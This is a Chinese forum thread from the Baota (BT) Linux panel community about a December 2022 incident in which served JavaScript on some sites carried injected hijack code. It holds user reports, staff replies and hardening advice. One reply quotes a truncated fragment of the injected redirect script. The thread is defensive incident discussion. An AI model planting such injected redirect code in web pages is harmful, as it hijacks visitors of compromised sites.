当前位置:论坛首页 > Linux面板 > 讨论

【已完成】【非标题党】宝塔严重未知安全性漏洞

发表在 Linux面板2022-12-8 19:32 [复制链接] 16 14256

本帖最后由 堡塔运维香菜卷 于 2023-3-23 15:56 编辑

论坛已经很多人反馈了,具体内容参考loc
https://hostloc.com/forum.php?mod=viewthread&tid=1111691&extra=page%3D2&mobile=2

今天有个朋友的js都被加了一段劫持代码,
经过检查发现实际文件不存在劫持js代码,但是访问有,晚上的时候论坛出现好几例被挂马,数据异常,异地登录的反馈

下午给url加上随机数,劫持js消失,疑似缓存被篡改,但是原服务器没有安装任何除nginx php mysql之外的插件

检查了nginx配置文件,伪静态,都没能检查出问题。
可以确认就是宝塔的问题,因为朋友的那台机器根本没有任何web篡改的迹象,并且文件检查都是正常的。

Screenshot_2022-12-08-19-26-20-038_com.tencent.mm.jpg
使用道具 举报 只看该作者 回复
发表于 2022-12-8 19:51:58 | 显示全部楼层
您好,如果您那边有机器的话,可通过论坛私信联系我您信息,这边可协助您排查
使用道具 举报 回复 支持 反对
发表于 2022-12-8 20:28:37 | 显示全部楼层
一台服务器昨天莫名奇妙被人登录了宝塔,有点奇怪,就是最*几天,只能先关了面板,用得时候再ssh连上开启
使用道具 举报 回复 支持 反对
发表于 2022-12-8 20:42:34 | 显示全部楼层
宝塔用户_wbidlm 发表于 2022-12-8 20:28
一台服务器昨天莫名奇妙被人登录了宝塔,有点奇怪,就是最*几天,只能先关了面板,用得时候再ssh连上开启 ...

管用吗这样  我也是关闭了
使用道具 举报 回复 支持 反对
发表于 2022-12-8 20:56:01 | 显示全部楼层
樱落丶未央 发表于 2022-12-8 20:42
管用吗这样  我也是关闭了

一直用得ssh密钥登录,只开放了业务端口,之前服务器被人黑过几次,最后都是找到是php版本漏洞,这次排查了一下,怎么都找不到问题,感觉是宝塔得问题,毕竟开源被人研究出来漏洞很正常;这个人登录我得服务器就上来find 程序代码,感觉像是来挂码得
使用道具 举报 回复 支持 反对
发表于 2022-12-8 21:19:10 | 显示全部楼层
感谢反馈,当前有个别用户反馈被挂马的情况,我们正在全力排查中,暂时未发现面板存在有安全漏洞的风险。如果您担心面板存在风险,可以登录终端执行bt stop命令停止面板服务,停止面板服务不会影响您网站的正常运行。
使用道具 举报 回复 支持 反对
发表于 2022-12-8 23:08:34 | 显示全部楼层
桥哥 发表于 2022-12-8 21:19
感谢反馈,当前有个别用户反馈被挂马的情况,我们正在全力排查中,暂时未发现面板存在有安全漏洞的风险。如 ...

您好,请问从新启用的命令是什么,谢谢

bt restart  发表于 2022-12-9 01:03
使用道具 举报 回复 支持 反对
发表于 2022-12-8 23:36:16 | 显示全部楼层
桥哥 发表于 2022-12-8 21:19
感谢反馈,当前有个别用户反馈被挂马的情况,我们正在全力排查中,暂时未发现面板存在有安全漏洞的风险。如 ...

https://hostloc.com/thread-1111691-1-1.html
使用道具 举报 回复 支持 反对
发表于 2022-12-9 00:08:00 | 显示全部楼层
装有wordpress
apache,nginx都一样
使用移动UA,访问HTTP,非HTTPS。
JS文件被插入代码
(function(){var e=document,c=e.createElement("a");c.,e.body.appendChild(c),c.click()})()
不是每次都插入,还IP清除缓存基本第一次都会被插入。
空网站目录依然跳转。
使用道具 举报 回复 支持 反对
发表于 2022-12-9 09:11:49 | 显示全部楼层
宝塔用户_jdqmcs 发表于 2022-12-8 23:08
您好,请问从新启用的命令是什么,谢谢

rm -f /www/server/panel/data/close.pl
使用道具 举报 回复 支持 反对
发表于 2022-12-9 09:27:52 | 显示全部楼层
xiaobo9299556 发表于 2022-12-9 09:11
rm -f /www/server/panel/data/close.pl

qnmd 误导人家是吧
使用道具 举报 回复 支持 反对
发表于 2022-12-9 15:55:24 | 显示全部楼层

没事的 谢谢 官哥已经回复了:bt restart
使用道具 举报 回复 支持 反对
发表于 2022-12-13 13:35:31 | 显示全部楼层
谢花郎 发表于 2022-12-8 19:51
您好,如果您那边有机器的话,可通过论坛私信联系我您信息,这边可协助您排查 ...

你好,感谢您的回复。客户听说已经联系你们了,但是似乎也没得到一个肯定的答和修复方案。目前公司这边所有宝塔全部下线了,前几天忙着转移数据去了。我个人还是希望继续使用宝塔。
使用道具 举报 回复 支持 反对
发表于 2022-12-13 15:17:32 | 显示全部楼层
dwtonline 发表于 2022-12-13 05:35
你好,感谢您的回复。客户听说已经联系你们了,但是似乎也没得到一个肯定的答和修复方案。目前公司这边所 ...
因Nginx被篡改导致网站被挂马,联系我们客服,免费跟进处理,联系方式电话:0769-23030556,或QQ:1021266737

当前还在统计样本中,目前是少部分用户的海外机器被挂马,经分析,非大面积服务器被挂马,因挂马的服务器日志被清空了,分析溯源需要点时间。我们已排查了所有节点服务器,校对了文件MD5值,无异常。感谢支持,对于挂马事情给您造成的影响,深感抱歉。

宝塔面板中可以做出下面的措施进行网站、面板、服务器加固:
1、升级面板到最新版,已经是最新版的,在首页修复面板,修改安全入口及修改账号密码,开启动态口令认证(增强安全性)
2、nginx升级到当前主版本号的最新子版本,如1.22.0升级到1.22.1,已经是最新版的,请卸载重装
3、因生产需要暂时无法升级面板或nginx的,开启动态口令认证,有条件的设置授权IP
5、【企业版防篡改-重构版】插件可以有效防止网站被篡改,建议开启并设置root用户禁止修改文件(需要使用时再放开),另外,将nginx关键执行目录(/www/server/nginx/sbin)锁住
6、【宝塔系统加固】插件中的【关键目录加固】功能,可以将nginx关键执行目录(/www/server/nginx/sbin)锁住,此目录在正常使用中不会有任何修改的行为,除了重装以外其他修改行为均可视为被篡改,所以将它锁上。


使用道具 举报 回复 支持 反对
发表于 2022-12-24 19:26:16 | 显示全部楼层
确实有不少我之前也被挂马了,静态网站
使用道具 举报 回复 支持 反对
12下一页
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

立即付费处理

工作时间:09:00至24:00

快速回复 返回顶部 返回列表